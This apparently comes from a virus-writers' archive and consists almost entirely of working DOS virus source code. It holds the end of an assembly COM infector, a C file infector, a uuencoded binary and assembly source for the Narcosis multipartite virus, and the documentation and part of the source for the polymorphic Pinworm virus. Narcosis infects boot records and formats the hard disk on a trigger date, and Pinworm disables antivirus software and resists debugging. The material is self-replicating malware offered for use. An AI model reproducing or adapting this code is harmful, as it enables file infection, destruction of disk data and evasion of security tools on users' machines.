ah,4e ; Find the first match get_f: lea dx,[bp+offset filemask] ; Load the offset filemask dx int 21 ; dos call jc Jp_err ; can't find the file name outahere jmp getbad ; sloppy jump to get over near jp_err: jmp exit_error ; jump problem getbad: mov ah,2f ; get the new DTA int 21 ; this is returned in bx xor ax,ax ; clear up ax lea dx,[bp+offset end_it+1e] ; Load the offset fname (á) Mov Cl, 7Ah ; This loads 7a04 into ax Xchg Ah, Cl ; shr makes 7a04 into 3d02 Mov Al, 04h ; ' ' Shr Ax,1 ; Open The File Up int 21 ;mov ax,3d02 ; open file function - read/write ;int 21 ; dos call xchg bx,ax ; move the file handle into BX mov ax,5700 ; get the files original date int 21 ; and time and move this mov [bp+date],dx ; value to date/ time mov [bp+time],cx ; move cd into buffer lea di,[bp+offset end_it+1a] ; Load the offset fsize (á) mov ax,word ptr ds:[di] ; Move this fsize into ax sub ax,3 ; Take off three to build jmp mov word ptr [bp+jump_address+1],ax ; save these bytes ; at jump address+1 which is ; jmp (xx xx+3) or 0e9 xx xx mov ah,3f ; Read file mov cx,4 ; Read 4 bytes lea dx,[bp+offset return_bytes] ; Load the offset dx int 21 ; dos call lea di,[bp+offset return_bytes+3] ; Load the offset of ; the fourth byte ; we just read into ; the virus cmp byte ptr ds:[di],90 ; Is this byte a nop? je nxtvic ; If so assume infected, ; close file, and run ; infection cycle again mov ax,4200 ; Goto beginning of file xor cx,cx ; cx must be 0 xor dx,dx ; dx must be 0 int 21 ; dos call mov ah,40 ; Write file mov cx,4 ; Write four bytes lea dx,[bp+offset jump_address] ; Load the offset of ; the bytes to write ; (which is our jmp constuction) int 21 ; dos call mov ax,4202 ; Goto end of file xor cx,cx ; cx must be 0 xor dx,dx ; dx must be 0 int 21 ; dos call call what ; this is the actual part tha writes jmp $+2 ; thanks again screaming exit_n: mov cx,[bp+time] ; Write the original date mov dx,[bp+date] ; back to the infected file mov ax,5701 ; dos write date function int 21 ; dos call mov ah,3e ; Close the file, the ; infection is complete int 21 ; dos call cmp [bp+counter],03 ; how many files do you want to infect? je exit_error nxtvic: mov ah,4f ; Continue the infection ; process. Find the next match! jmp get_f ; Doit again, and stop only ; when int 21 ah=4f reports ; no more matches! exit_error: cli ; clear interupts mov ah,1a ; Set DTA mov dx,80 ; Change to original DTA int 21 ; dos call mov bx,102 ; Set bx to 102 pop [bx] ; pop the last two saved ; bytes into ds:[102] dec bx ; decrease bx so that is dec bx ; points to 100 pop [bx] ; pop the first two saved ; bytes into ds:[100] push bx ; bx=100 xor ax,ax ; most viruses don't do this xor bx,bx ; sequence, but since some xor cx,cx ; programs assume the reg's xor dx,dx ; are set to 0 like they xor bp,bp ; should be, this is an xor si,si ; extra precaution. xor di,di ret ; return to host ntzmask db '*.NTZ',0 buff db ? date dw ? time dw ? filemask db '*M.COM',0 ; Look for *.com's jump_address db 0e9,0,0,90 ; jmp xx xx+3, and 90 is the new_dta dw ? ; infection marker how_much dw ? return_bytes db 0cdh,20,0,0 ; simple way to end the ; first generation (it's end_it: ; the same as saying int 20) end start end code % C_Virus % ~~~~~~~~~~~ /* C-Virus: A generic .COM and .EXE infector Written by Nowhere Man Project started and completed on 6-24-91 Written in Turbo C++ v1.00 (works fine with Turbo C v2.00, too) */ #pragma inline // Compile to .ASM #include #include #include #include #include void hostile_activity(void); int infected(char *); void spread(char *, char *); void small_print(char *); char *victim(void); // #define DEBUG #define ONE_KAY 1024 // 1k #define TOO_SMALL ((6 * ONE_KAY) + 300) // 6k+ size minimum #define SIGNATURE "NMAN" // Sign of infection int main(void) { /* The main program */ spread(_argv[0], victim()); // Perform infection small_print("Out of memory\r\n"); // Print phony error return(1); // Fake failure... } void hostile_activity(void) { /* Put whatever you feel like doing here...I chose to make this part harmless, but if you're feeling nasty, go ahead and have some fun... */ small_print("\a\a\aAll files infected. Mission complete.\r\n"); exit(2); } int infected(char *fname) { /* This function determines if fname is infected */ FILE *fp; // File handle char sig[5]; // Virus signature fp = fopen(fname, "rb"); fseek(fp, 28L, SEEK_SET); fread(sig, sizeof(sig) - 1, 1, fp); #ifdef DEBUG printf("Signature for %s: %s\n", fname, sig); #endif fclose(fp); return(strncmp(sig, SIGNATURE, sizeof(sig) - 1) == 0); } void small_print(char *string) { /* This function is a small, quick print routine */ asm { push si mov si,string mov ah,0xE } print: asm { lodsb or al,al je finish int 0x10 jmp short print } finish: asm pop si } void spread(char *old_name, char *new_name) { /* This function infects new_name with old_name */ /* Variable declarations */ FILE *old, *new; // File handles struct ftime file_time; // Old file date, time int attrib; // Old attributes long old_size, virus_size; // Sizes of files char *virus_code = NULL; // Pointer to virus int old_handle, new_handle; // Handles for files /* Perform the infection */ #ifdef DEBUG printf("Infecting %s with %s...\n", new_name, old_name); #endif old = fopen(old_name, "rb"); // Open virus new = fopen(new_name, "rb"); // Open victim old_handle = fileno(old); // Get file handles new_handle = fileno(new); old_size = filelength(new_handle); // Get old file size virus_size = filelength(old_handle); // Get virus size attrib = _chmod(new_name, 0); // Get old attributes getftime(new_handle, &file_time); // Get old file time fclose(new); // Close the virusee _chmod(new_name, 1, 0); // Clear any read-only unlink(new_name); // Erase old file new = fopen(new_name, "wb"); // Open new virus new_handle = fileno(new); virus_code = malloc(virus_size); // Allocate space fread(virus_code, virus_size, 1, old); // Read virus from old fwrite(virus_code, virus_size, 1, new); // Copy virus to new _chmod(new_name, 1, attrib); // Replace attributes chsize(new_handle, old_size); // Replace old size setftime(new_handle, &file_time); // Replace old time /* Clean up */ fcloseall(); // Close files free(virus_code); // Free memory } char *victim(void) { /* This function returns the virus's next victim */ /* Variable declarations */ char *types[] = {"*.EXE", "*.COM"}; // Potential victims static struct ffblk ffblk; // DOS file block int done; // Indicates finish int index; // Used for loop /* Find our victim */ if ((_argc > 1) && (fopen(_argv[1], "rb") != NULL)) return(_argv[1]); for (index = 0; index < sizeof(types); index++) { done = findfirst(types[index], &ffblk, FA_RDONLY | FA_HIDDEN | FA_SYSTEM | FA_ARCH); while (!done) { #ifdef DEBUG printf("Scanning %s...\n", ffblk.ff_name); #endif /* If you want to check for specific days of the week, months, etc., here is the place to insert the code (don't forget to "#include "!) */ if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize > TOO_SMALL)) return(ffblk.ff_name); done = findnext(&ffblk); } } /* If there are no files left to infect, have a little fun... */ hostile_activity(); return(0); // Prevents warning } % Narcosis.asm % ~~~~~~~~~~~~~~~~ ÄÄÍÍþ Narcosis virus þÍÍÄÄ By Evil Avatar þ COM/EXE/OVL infections þ Multipartite þ Direct and indirect infections þ Sub-stealth capabilities þ No CHKDSK errors ÄÄÍÍþ Narcosis virus þÍÍÄÄ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- section 1 of uuencode 5.24 of file narcosis.com by R.E.M. begin 644 narcosis.com M&AX``+@!^KI%6F0>, MAIL'Q!Z$`(F>G0>,AI\'!PX?C;8``"O_5[G2`_.EZ)(#'_K'!DP`8`2,!DX` MQP:$`%@!C`:&`/NX046[047-(1X'*]N!_*W>=1X&'XS`!1``+@&&;@4N`X9H M!?J.T(NF:@7[+O^N;`4.'PX'OP`!5XVV;`6DI<,>OP!\5[Z7!1X'#A^Y``'S MI08?#@<>@?J``'0%4N@<`UH?+L<&<`0``,0>3``NB1Z9!RZ,!IL'^L<&3`!O M!(P.3@#[R^@H!(ORK#PN=`D\`'7WZ"X$ZUVL)%^*V*TE7U^`^T-T$8#[1703 M@/M/=>,]5DQT$.O*\".V,0>D``NB1ZA!RZ,!J,'QP:0`#\%C`Z2`!^T/>CT`E"[(!*3 MS2^X%A(KVR:*'^EP6_;`6DI2T#`,8&EP7IHY@%ZVB#Q`CIE0"#/J,%_W7S4U!2 M#@>^I06_:`7\I:5&1J6E@P:A!7RAGP6Q!-/@D5I84%(KP8/:`+D0`/?QHZT% MB1:K!:.E!<<&IP6MWEI8!9<%@](`N0`"]_%0"])T`4"CFP58@.0!HYD%6U\' MM$"YEP69Z`4")L=%%0``)L=%%P``M$"Y&@"ZEP7H[@&X`5=:68'"`,CHX@'& M!J4#`;0^Z-@!*\".V"[$%J$'B1:0`(P&D@#HX`'I#O[K/)`````````````` M```````````````````````````````````````````````````````````` M`````"O`CMCZCM"\`'S[@RX3!`*+'A,$L0;3XX[#N`0"*]NY`2?-$U*T!,T: M@?H)!G0*6@:XT0!0RT5!`+L`4([#NH``*\"Y`0#-$[@)`\T3_L6`Y4!U]/[& MZ^D&'[@!`KN7!;D!`+J``,T3@3[-!45!=#JX`0.[EP6Y`@"Z@`#-$[@$`RO; MN0,`NH``S1/'!M4#`P"_EP6^M0.Y+`#SI;@!`[N7!;D!`+J``,T3PX#\`G1& M@/P#=$$N_RZ9!^D``.C+`/TKP([`)L4>A`",V#T`"'<@#A^_GP>'!:]T%HD= M^B;'!H0`6`$FC`Z&`/O'!G`$[O_HJP#KM2Z)%J4#G"[_'ID'4%:@.Y.P#SI+@!`[MW`[D!`,<&U0,!)^@F`'(@N`0#*]NY`2?H&0#K M$RO`Z!(`N`$"NY<%N0$`Z`8`<[GH)`#/G"[_'ID'PYPN_QZ=!\//+H\&EP=0 M4U%25597'@:<+O\FEP75I96U@N_R:7!P````#-(```*BXJ D``!5JEM.87)C;W-I========================================================= ; ; Narcosis Virus ; (c) 1994 Evil Avatar ; ; TASM /M3 NARCOSIS ; TLINK /X NARCOSIS ; EXE2BIN NARCOSIS NARCOSIS.COM .model tiny .code org 0 ID equ 666h VMEM equ (Virus_end-Narcosis+15)/16+1 VSIZEK equ (Virus_end-Narcosis+1023)/1024 V_FILE equ (heap-Narcosis) ;=====( Entry point for COM/EXE files )==================================== Narcosis: sbb bl, byte ptr ds:[0] ;new stealth technique mov ax, 0fa01h mov dx, 5945h int 16h ;disable MSAV push ds ;save PSP segment call delta bye_bye: jmp format delta: pop bp sub bp, offset bye_bye ;get delta offset mov ah, 2ah int 21h ;check the date cmp dx, 609h ;is it June 9th? je bye_bye ;yes? say your prayers lamer mov ah, 30h mov bx, ID int 21h ;installation check cmp al, 3 ;are we installed? jb install_done ;why yes, yes we are! mov ax, ds dec ax ;get MCB segment mov ds, ax ;move MCB segment into ds cmp byte ptr ds:[0], 'Z' ;is it last MCB in chain? jnz install_done ;no? don't install self sub word ptr ds:[3], VMEM ;shrink host allocation sub word ptr ds:[12h], VMEM ;alter PSP memory size field mov es, word ptr ds:[12h] ;get new virus segment sub ax, ax mov ds, ax ;BIOS data table/IVT sub byte ptr ds:[413h], VSIZEK ;shrink memory size (int 12h) push es ;save virus segment les bx, dword ptr ds:[13h*4] ;get int 13h vector mov word ptr ss:[bp+save_13], bx mov word ptr ss:[bp+save_13+2], es ;save int 13h vector les bx, dword ptr ds:[21h*4] ;get int 21h vector mov word ptr ss:[bp+save_21], bx mov word ptr ss:[bp+save_21+2], es ;save int 21h vector pop es ;get virus segment push cs pop ds ;ds now equals cs lea si, [bp+offset Narcosis] ;start of virus code sub di, di push di mov cx, (Virus_end-Narcosis)/2 ;size of virus in words rep movsw ;copy virus to upper memory call infect_hd pop ds cli ;clear interrupts mov word ptr ds:[13h*4], offset int13 mov word ptr ds:[13h*4+2], es ;set new int 13h vector mov word ptr ds:[21h*4], offset int21 mov word ptr ds:[21h*4+2], es ;set new int 21h vector sti ;allow interrupts install_done: mov ax, 4541h mov bx, 4541h int 21h ;infect a file push ds ;restore PSP segment pop es ;in both ds and es sub bx, bx ;clear ID so host won't ;accidently use it cmp sp, 0deadh ;is this an .exe file? jne return_com ;no? restore com stuff push es pop ds mov ax, es ;ax=PSP segment add ax, 10h ;adjust for PSP size add word ptr cs:[bp+comsave+2], ax ;set up cs add ax, word ptr cs:[bp+ss_sp] ;set up ss cli ;clear ints for stack manipulation mov ss, ax ;set ss mov sp, word ptr [bp+ss_sp+2] ;set sp sti ;restore ints jmp dword ptr cs:[bp+comsave] ;jump to old program return_com: push cs ;needed? pop ds ;ds=cs push cs ;needed? pop es ;es=cs mov di, 100h ;beginning of program push di ;for later return lea si, [bp+comsave] ;first 3 bytes of program movsb movsw ;restore first 3 bytes ret ;return to program ;=====( Entry point after boot sector retf )=============================== high_code: push ds mov di, 7c00h push di mov si, offset buffer push ds pop es push cs pop ds mov cx, 100h ;not very optimised rep movsw push es pop ds push cs pop es push ds cmp dx, 80h je next push dx call infect_hd pop dx next: pop ds mov word ptr cs:[int13b+1], 0 les bx, dword ptr ds:[13h*4] mov word ptr cs:[save_13], bx mov word ptr cs:[save_13+2], es cli mov word ptr ds:[13h*4], offset int13b mov word ptr ds:[13h*4+2], cs sti retf ;=====( Check file extension )============================================= check_ext: call push_all mov si, dx find: lodsb cmp al, '.' je found_ext cmp al, 0 jne find done_ext: call pop_all jmp dos21 found_ext: lodsb and al, 5fh mov bl, al lodsw and ax, 5f5fh cmp bl, 'C' je maybe_com cmp bl, 'E' je maybe_exe cmp bl, 'O' jne done_ext cmp ax, 'LV' je infect2 jmp done_ext maybe_com: cmp ax, 'MO' je infect2 jmp done_ext maybe_exe: cmp ax, 'EX' je infect2 jmp done_ext infect2: jmp infect_file2 ;=====( Interrupt 21h handler )============================================ int21: cmp ah, 30h ;installation check je install_check cmp ah, 11h ;find first je stealth_dir ;stealth cmp ah, 12h ;find next je stealth_dir ;stealth cmp ah, 4bh ;execute je _infect ;infect it cmp ah, 3dh ;open je check_ext ;infect it cmp ah, 41h ;delete je check_ext ;infect it cmp ah, 56h ;rename je check_ext ;infect it cmp ah, 43h ;attribs je check_ext ;infect it cmp ax, 4541h je go_infect dos21: jmp dword ptr cs:[save_21] ;jump to DOS int 21h _infect: jmp infect_file ;=====( Install check )==================================================== install_check: cmp bx, ID ;did virus call? jne dos21 ;no? call original interrupt mov al, 2 ;set return code iret ;return ;=====( Dir stealth )====================================================== stealth_dir: pushf call dword ptr cs:[save_21] call push_all test al, al jnz no_stealth mov ah, 51h int 21h mov es, bx cmp bx, es:[16h] jne no_stealth mov ah, 2fh int 21h cmp byte ptr ds:[bx], -1 jne not_extended add bx, 7 not_extended: cmp word ptr ds:[bx+19h], 0c800h jb no_stealth sub ds:[bx+19h], 0c800h sub ds:[bx+1dh], V_FILE sbb word ptr ds:[bx+1fh], 0 no_stealth: call pop_all iret ;=====( Direct infection routine )========================================= go_infect: sub ax, bx jnz dos21 push es pop ds mov byte ptr ds:[scratch], 0 mov dx, offset newDTA mov ah, 1ah call call21 mov ah, 4eh get_file: mov dx, offset files mov cx, 7 call call21 jc no_more mov ax, 3d00h mov dx, offset newDTA+1eh int 21h xchg ax, bx mov ah, 3eh call call21 cmp byte ptr ds:[scratch], 1 je no_more mov ah, 4fh jmp get_file no_more: pop bx es ax ds push ax es bx mov dx, 80h mov ah, 1ah call call21 iret ;=====( File infection routine )=========================================== infect_file: call push_all infect_file2: push ds sub ax, ax mov ds, ax ;interrupt vector table les bx, dword ptr ds:[24h*4] ;get int 24h vector mov word ptr cs:[save_24], bx mov word ptr cs:[save_24+2], es ;save it mov word ptr ds:[24h*4], offset int24 mov word ptr ds:[24h*4+2], cs ;set new int 24h pop ds mov ah, 3dh call call21 ;open file read only push ax ;save handle mov bx, 1220h xchg ax, bx ;put handle in bx int 2fh ;get job file table mov ax, 1216h sub bx, bx mov bl, byte ptr es:[di] ;get sft number for file handle int 2fh ;get address of sft mov word ptr es:[di+2], 2 ;set read/write pop bx ;restore handle push cs pop ds ;set ds for code segment reference mov ah, 3fh mov cx, 1ah mov dx, offset buffer call call21 ;read first 1ah bytes mov cx, word ptr es:[di+0dh] ;get time mov dx, word ptr es:[di+0fh] ;get date cmp dx, 0c800h ;check 100 years jae bad_date ;if so, already infect push cx dx es di ;save time and date mov ax, word ptr es:[di+11h] mov dx, word ptr es:[di+13h] mov word ptr es:[di+15h], ax mov word ptr es:[di+17h], dx cmp word ptr ds:[buffer], 'ZM' je exe_file cmp word ptr ds:[buffer], 'MZ' je exe_file ;if .exe file then infect it or dx, dx jnz bad_file cmp ax, 65535-(Virus_end-Narcosis) jnb bad_file cmp ax, 400h jb bad_file push cs pop es mov si, offset buffer mov di, offset comsave movsb movsw ;move combytes to comsave sub ax, 3 mov byte ptr ds:[buffer], 0e9h mov word ptr ds:[buffer+1], ax ;set up jump jmp write_virus bad_file: add sp, 8 bad_date: jmp close exe_file: cmp word ptr ds:[buffer+12], -1 jne bad_file push bx ax dx cs ;save handle pop es mov si, offset buffer+0eh mov di, offset ss_sp cld movsw movsw inc si inc si movsw movsw add word ptr ds:[buffer+0ah], VMEM ;new minimum memory mov ax, word ptr ds:[buffer+8] ;get header size mov cl, 4 shl ax, cl ;change to bytes xchg ax, cx ;save it pop dx ax push ax push dx ;save file size sub ax, cx sbb dx, 0 ;get new cs:ip mov cx, 10h div cx mov word ptr ds:[buffer+16h], ax ;set virus cs mov word ptr ds:[buffer+14h], dx ;set virus ip mov word ptr ds:[buffer+0eh], ax ;set virus ss mov word ptr ds:[buffer+10h], 0deadh ;set virus sp pop dx pop ax ;get file size add ax, (heap-Narcosis) adc dx, 0 ;add virus size mov cx, 200h div cx ;convert to pages push ax ;save it or dx, dx ;check for remainder je no_remainder ;no? skip it inc ax ;increment number of pages no_remainder: mov word ptr ds:[buffer+4], ax ;save number of pages pop ax and ah, 1 mov word ptr ds:[buffer+2], ax ;file size MOD 512 pop bx write_virus: pop di es mov ah, 40h mov cx, V_FILE cwd call call21 ;write virus to EOF mov word ptr es:[di+15h], 0 mov word ptr es:[di+17h], 0 mov ah, 40h mov cx, 1ah ;restore buffer size mov dx, offset buffer call call21 ;write header or jump mov ax, 5701h pop dx cx add dx, 0c800h ;add 100 years call call21 ;set file time and date mov byte ptr ds:[scratch], 1 close: mov ah, 3eh call call21 ;close file sub ax, ax mov ds, ax ;interrupt vector table les dx, dword ptr cs:[save_24] ;get int 24h vector mov word ptr ds:[24h*4], dx mov word ptr ds:[24h*4+2], es ;restore old int 24h vector call pop_all jmp dos21 ;return to caller ;=====( Boot Sector )====================================================== bootsec: jmp loader xchg ax, ax bootparms: newDTA db 2bh dup (?) scratch db 10h dup (?) loader: sub ax, ax mov ds, ax cli mov ss, ax mov sp, 7c00h sti sub word ptr ds:[413h], (virus_end-narcosis+1023)/1024 mov bx, word ptr ds:[413h] mov cl, 6 shl bx, cl mov es, bx mov ax, 200h+(heap2-narcosis+511)/512 sub bx, bx mov cx, 2701h sector equ $-2 int 13h push dx mov ah, 4 int 1ah cmp dx, 609h je format pop dx push es mov ax, offset high_code push ax retf sig db 'EA', 0 format: mov bx, 5000h mov es, bx mov dx, 80h next_head: sub ax, ax mov cx, 1 int 13h next_track: mov ax, 309h int 13h inc ch and ch, 40h jne next_track inc dh jmp next_head loader_end: ;=====( Infect master boot record )======================================== infect_hd: push es pop ds mov ax, 201h mov bx, offset buffer mov cx, 1 mov dx, 80h int 13h ;read in master boot record cmp word ptr ds:[buffer+(sig-loader)], 'AE' je infected mov ax, 301h mov bx, offset buffer mov cx, 2 mov dx, 80h int 13h ;write mbr to sector 2 mov ax, 300h+(heap2-narcosis+1ffh)/200h sub bx, bx mov cx, 3 mov dx, 80h int 13h ;write virus after partition table mov word ptr ds:[sector], 3 mov di, offset buffer mov si, offset loader mov cx, (offset loader_end-offset loader)/2 rep movsw ;copy loader onto boot code mov ax, 301h mov bx, offset buffer mov cx, 1 mov dx, 80h int 13h ;write infected master boot record infected: retn ;=====( Interrupt 13h handler )============================================ int13: cmp ah, 2 je infect_disk cmp ah, 3 je infect_disk bios13: jmp dword ptr cs:[save_13] int13b: db 0e9h, 0, 0 call push_all std sub ax, ax mov es, ax lds bx, dword ptr es:[21h*4] mov ax, ds cmp ax, 800h ja done13 push cs pop ds mov di, offset save_21+2 xchg ax, word ptr ds:[di] scasw je done13 mov word ptr ds:[di], bx cli mov word ptr es:[21h*4], offset int21 mov word ptr es:[21h*4+2], cs sti mov word ptr ds:[int13b+1], -((int13b-int13)+3) done13: call pop_all jmp int13 ;=====( Disk infection routine )=========================================== infect_disk: mov word ptr cs:[scratch], dx pushf call dword ptr cs:[save_13] push ax push si pushf mov si, sp mov ax, word ptr ss:[si] mov word ptr ss:[si+10], ax popf pop si pop ax call push_all ;save all the registers jc no_infect push cs cs pop ds es ;make ds, es equal cs mov dx, word ptr ds:[scratch] cmp dx, 80h ;is it a hard disk? jae no_infect ;yes? see if a boot sector read mov ax, 201h mov bx, offset buffer mov cx, 1 call call13 ;read boot sector from disk jc reset sig_check: cmp word ptr ds:[buffer+(sig-bootsec)], 'AE' je no_infect mov si, offset buffer+3 mov di, offset bootparms mov cx, 3bh rep movsb ;copy parameters to our boot block mov ax, 301h mov bx, offset bootsec mov cx, 1 mov word ptr ds:[sector], 2701h call call13 ;write boot sector to disk jc no_infect mov ax, 300h+((heap2-narcosis+511)/512) sub bx, bx mov cx, 2701h call call13 ;write virus to disk jmp no_infect reset: sub ax, ax call call13 mov ax, 201h mov bx, offset buffer mov cx, 1 call call13 jnc sig_check no_infect: call pop_all iret ;=====( Fake an int 13h call )============================================= call13: pushf call dword ptr cs:[save_13] retn ;=====( Fake an int 21h call )============================================= call21: pushf call dword ptr cs:[save_21] retn ;=====( Interrupt 24h handler )============================================ int24: iret ;just return ;=====( Push all registers )=============================================== push_all: pop word ptr cs:[p_all] ;save return address push ax bx cx dx bp si di ds es ;save registers pushf ;save flags jmp word ptr cs:[p_all] ;return to caller ;=====( Pop all registers )================================================ pop_all: pop word ptr cs:[p_all] ;save return address popf ;restore flags pop es ds di si bp dx cx bx ax ;restore registers jmp word ptr cs:[p_all] ;return to caller ;=====( End of boot sector )=============================================== ss_sp dd 0 ;old stack pointer comsave db 0cdh, 20h, 0, 0 files db '*.*', 0 bs_end: db 1feh-(bs_end-bootsec) dup (?) dw 0aa55h ;=====( Virus data area )================================================== virus db '[Narcosis]', 0 author db '(c) 1994 Evil Avatar', 0 heap: ;discardable variables buffer db 200h dup (?) ;buffer for file/disk reads heap2: ;save the boot sector p_all dw ? ;push/pop all return address save_13 dd ? ;int 13h entry save_21 dd ? ;int 21h entry save_24 dd ? ;int 24h entry Virus_end: end Narcosis % Pinworm.asm % ~~~~~~~~~~~~~~~ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ------ PiïWéRM v1.00 coded by ûirogen ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ------ Original Release: 06-03-94 Source Code Release: 07-05-94 Welcome to my latest viral creation -- PiïWérM version 1.00. Definition - PINWORM: A parasite that crawls out your ass and lays little white eggs .. It's amazing what you can learn from Biology class. PiïWérM is a memory resident, polymorphic, parastic infector of COM and EXE files. Files become infected when they are executed. Eligible files are COMs which will not exceed the 64k boundary and EXE files smaller than approx 256k and are not "new-format" EXEs such as Windoze filez. COMMAND.COM may also become infected. Original Infection Marker- Infected EXE files have their checksum in the header set to random value other than 0. This should prevent anti-virus software from easily determining if an exe is infected by a simple check of the header. Infected COM files will have the fourth byte set to 0. Polymorphism- This virus has 0 bytes constant and 0 ops in constant locations in the decryptor. It's full polymorphic. The garbage code consists of randomly retrieved one-byte operands, OR a constant fill of a single one-byte operand. The virus selects between these types of garbage code randomly in order to prevent scanners from detecting the actual garbage code. Anti-Anti virus- When a file becomes infected, CHKLIST.MS and CHKLIST.CPS files are deleted in that directory. Also, when the user trys to execute EXE files ending in the characters 'AV', 'SCAN', or 'OT' the executable's minimum memory requirment in the header is changed to FFFFh. Thus making the file unusable whether the virus is in memory or not. Pinworm also uses VSAFE and VWATCH's uninstall API as an installation check. When pinworm checks itself for residency it also removes these shitty programs from memory. Anti-Debugging- This virus uses a double encryption technique to prevent debugging of the code. The first encryptor is ofcourse polymorphic, while the second is there only to try and deter debuggers. It's hardly foolproof .. but nonetheless will keep out the ignorant. Symptoms- The user may notice a slight size increase for infected COM and EXE files. There may also be a total conventional memory size decrease of approx 5k, however the virus randomly decides not to protect its code in memory. As stated above, CHKLIST.MS and CHKLIST.CPS files may be deleted as well as "Not enough memory" errors when trying to load many anti-virus applications. Additonal- -Pinworm uses it's own critical error handler. -The virus is kept encrypted in memory Activation- On the 1st of any month, Pinworm will continously play with the keyboard lights and create directories named after itself. In these directories will be several files that together form a message from ûirogen to the general populous. Length: Code length - Approximatly 1900 bytes Added phile size - Varies from 1900-2200 bytes Detected by: Nothing, nada, nope, kein As of SCAN v2.00.0 F-PROT v2.11 and TBAV v6.20 Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-- Included in this archive should be: INFECTED.COM - Infected phile, second generation PINWORM.NFO - This phile PINWORM.ASM - Assembly language source code ; ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ------ ; PiïWéRM v1.00 coded by ûirogen ; þ Original Varient ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ------ ; ; See enclosed NFO for more info.. ; ; The code should be sufficiently commented - and I even ran it thru a ; filter to make it look perty. ; ; compile like so: ; TASM /m pinworm ; Tlink pinworm ; --convert to COM-- ; cseg segment assume cs: cseg, ds: cseg, es: cseg, ss: cseg ; conditional compilation.. SECOND_CRYPT equ 1 ; use second cryptor? XTRA_SPACE equ 1 ; xtra space to prevent double cryptor? INCLUDE_INT3 equ 1 ; include INT 3 in garbage code? ; (slows the loop down alot) KILL_AV equ 1 ; Kill AVs as executed? KILL_CHKLIST equ 1 ; Kill MSAV/CPAV checksum filez? ; thingz to change.. kill_date equ 19 ; day of the month to play with user max_exe equ 4 ; max exe file size -high byte msg_filez equ 17 ; number of filenames for our msg ; polymorphic engine options.. inc_buf_size equ 20 ; INC buf enc_op_bsize equ 36 ; ENC buf ptr_buf_size equ 36 ; PTR buf cnt_buf_size equ 36 ; CNT&OP dj_buf_size equ 36 ; DEC&JMP loop_disp_size equ 20 ; loop buf range ;compile and change the below equate to the second byte of the JNZ operand org_loop equ 8Dh ; original JNZ offset signal equ 0FA01h ; AX=signal/INT 21h/installation chk vsafe_word equ 5945h ; magic word for VSAFE/VWATCH API enc_size equ offset first_crypt-offset encrypt enc2_size equ offset code_start-offset first_crypt real_start equ offset dj_buf+3 ; starting location of encryted code org 0h ; hellacious EXE offset calcs if !0 start: ;ÄÄÄÄ Encryptor/Decryptor Location ; Each opcode has predefined ranges to move within - once the opcode is ; determined, it is placed at the decided location within the buffer. ; 0 bytes constant ; encrypt: ptr_buf db ptr_buf_size-3 dup (90h) db 0BEh dw real_start+100h encryptor: cnt_buf db cnt_buf_size-3 dup(90h) db 0B8h ; AX:b8 dw offset vend-offset dj_buf enc_loop: loop_disp db loop_disp_size dup(90h) inc_buf db inc_buf_size dup(90h) enc_op_buf db enc_op_bsize dup(90h) misc_buf dw 9090h word_inc db 90h dj_buf db dj_buf_size-3 dup (90h) dec ax jnz enc_loop ; for orig. only ret_byte db 090h ; C3h or a NOP equiv. first_crypt: ; end of first cryptor ;ÄÄÄÄ Second encryptor ; Whose only purpose is to tear the shit out of debuggers. It obviously ; isn't invincible, but will at least keep the lamerz and ignorant morons ; like Patti Hoffman out of the code. ; ; þ Uses reverse direction word XOR encryption ; þ Uses the following techniques: ; ð JMP into middle of operand ; ð Replace word after CALL to kill stepping over call ; ð Kills INT 1 vector ; ð Disables Keyboard via Port 21h ; ð Reverse direction encryption prevents stepping past loop ; ð Uses SP as a crucial data register in some locations - if ; the debugger uses the program's stack, then it may very well ; phuck thingz up nicely. ; ð Uses Soft-Ice INT 3 API to lock it up if in memory. ; sti ; fix CLI in garbage code db 0BDh ; MOV BP,XXXX bp_calc dw 0100h push ds es ; save segment registers for EXE IF SECOND_CRYPT push ds dbg1: jmp mov_si ; 1 db 0BEh ; MOV SI,XXXX mov_si: db 0BEh ; MOV SI,XXXX rel2_off dw offset heap+1000h ; org copy: ptr way out there call shit add_bp: int 19h ; fuck 'em if they skipped jmp in_op ; 1 db 0BAh ; MOV DX,XXXX in_op: in al,21h push ax or al,02 jmp kill_keyb ; 1 db 0C6h kill_keyb: out 21h,al ; keyboard=off call shit6 past_shit: jmp dbl_crypt shit7: xor ax,ax ;null es mov es,ax mov bx,word ptr es: [06] ;get INT 1 ret shit: mov word ptr cs: add_bp[bp],0F503h ;ADD SI,BP mov word ptr cs: dec_si[bp],05C17h ;reset our shit sister ret shit2: mov word ptr cs: dec_si[bp],4E4Eh mov word ptr cs: add_bp[bp],19CDh ;reset our shit brother call shit3 jnc code_start ;did they skip shit3? xor dx,cx ret db 0EAh ;JMP FAR X:X shit4: db 0BAh ;MOV DX,XXXX sec_enc dw 0 mov di,4A4Dh ;prepare for Soft-ice ret shit3: mov ax,911h ;soft-ice - execute command call shit4 stc dec word ptr es: [06] ;2-kill INT 1 vector push si mov si,4647h ;soft-ice int 3 ;call SI execute - DS:DX-garbage pop si ret shit6: mov byte ptr cs: past_shit[bp],0EBh out 21h,al ; try turning keyboard off again ret dbl_crypt: ; main portion of cryptor mov cx,(offset heap-offset ret2_byte)/2+1 call shit7 dbl_loop: jmp $+3 ; 1 db 